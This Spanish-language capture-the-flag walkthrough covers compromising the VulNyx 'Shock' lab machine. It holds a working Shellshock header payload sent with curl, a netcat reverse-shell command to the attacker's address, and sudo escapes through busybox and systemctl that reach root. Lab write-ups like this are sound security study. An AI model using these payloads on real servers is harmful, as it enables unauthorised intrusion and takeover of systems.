VulNyx - Shock
Information
Shock es una máquina virtual vulnerable Linux de dificultad baja de la plataforma VulNyx, fue creada por el usuario m0w y funciona correctamente en el hipervisor VirtualBox.
Enumeration
Nmap
TCP
❯ nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.81
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-19 15:25 CET
Nmap scan report for 192.168.1.81
Host is up (0.0013s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp filtered ftp
22/tcp open ssh
80/tcp open http
❯ nmap -sVC -p22,80 192.168.1.81
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-19 15:26 CET
Nmap scan report for 192.168.1.81
Host is up (0.00032s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 37:36:60:3e:26:ae:23:3f:e1:8b:5d:18:e7:a7:c7:ce (RSA)
| 256 34:9a:57:60:7d:66:70:d5:b5:ff:47:96:e0:36:23:75 (ECDSA)
|_ 256 ae:7d:ee:fe:1d:bc:99:4d:54:45:3d:61:16:f8:6c:87 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
Shell (www-data)
80/TCP (HTTP)
Site (/)
Directory Brute Force
❯ gobuster dir -w /opt/common.txt -u http://192.168.1.81/
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.81/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/cgi-bin/ (Status: 403) [Size: 277]
/index.html (Status: 200) [Size: 20]
Progress: 4727 / 4727 (100.00%)
===============================================================
Finished
===============================================================
Site (/cgi-bin)
La ruta /cgi-bin es un directorio reservado por el servidor web que almacena los scripts CGI no soportados por el estándar HTML, sabiendo esto realizo fuzzing de archivos con extensiones que puedan usar dichos scripts
Directory Brute Force
❯ gobuster dir -w /opt/common.txt -u http://192.168.1.81/cgi-bin/ -x sh,cgi,py,pl
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.81/cgi-bin/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: sh,cgi,py,pl
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/shell.sh (Status: 500) [Size: 610]
Progress: 23635 / 23635 (100.00%)
===============================================================
Finished
===============================================================
En la ruta /cgi-bin encuentro el archivo shell.sh
Shellshock (CVE-2014-6271)
RCE
Confirmo que es vulnerable a Shellshock ejecutando comandos como usuario www-data
❯ curl -H "User-Agent: () { :; }; echo; /bin/bash -c 'id'" "http://192.168.1.81/cgi-bin/shell.sh"
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Reverse Shell
Ya ejecutando comandos intento obtener una reverse shell
❯ curl -H "User-Agent: () { :; }; echo; /bin/bash -c 'nc -e /bin/sh 192.168.1.10 443'" "http://192.168.1.81/cgi-bin/shell.sh"
Obtengo la shell como usuario www-data
❯ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.10] from (UNKNOWN) [192.168.1.81] 57676
id ; hostname
uid=33(www-data) gid=33(www-data) groups=33(www-data)
shock
Shell (will)
Enumeration
Sudo
El usuario www-data puede ejecutar como will el binario busybox con sudo
bash-4.3$ sudo -l
Matching Defaults entries for www-data on shock:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on shock:
(will) NOPASSWD: /usr/bin/busybox
Abuse
En GTFOBins nos dan el one liner para escapar una shell
bash-4.3$ sudo -u will /usr/bin/busybox sh
BusyBox v1.30.1 (Debian 1:1.30.1-4) built-in shell (ash)
Enter 'help' for a list of built-in commands.
/usr/lib/cgi-bin $ id ; hostname
uid=1001(will) gid=1001(will) groups=1001(will)
shock
/usr/lib/cgi-bin $ bash -i
will@shock:/usr/lib/cgi-bin$
Privilege Escalation
Enumeration
Sudo
El usuario will puede ejecutar como root el binario systemctl con sudo
will@shock:~$ sudo -l
Matching Defaults entries for will on shock:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User will may run the following commands on shock:
(root) NOPASSWD: /usr/bin/systemctl
Abuse
En GTFOBins nos dan el one liner para escapar una shell
will@shock:~$ sudo -u root /usr/bin/systemctl
Al ejecutar systemctl se abre en paginated mode y con !/bin/sh me convierto en usuario root
!/bin/bash
root@shock:/home/will# id ; hostname
uid=0(root) gid=0(root) groups=0(root)
shock
Flags
Ya como usuario root puedo leer las flags user.txt y root.txt
root@shock:/home/will# find / -name user.txt -o -name root.txt |xargs cat
f47fa6**************************
0afcf8**************************
Hasta aquí la resolución de la máquina Shock.
Happy Hacking!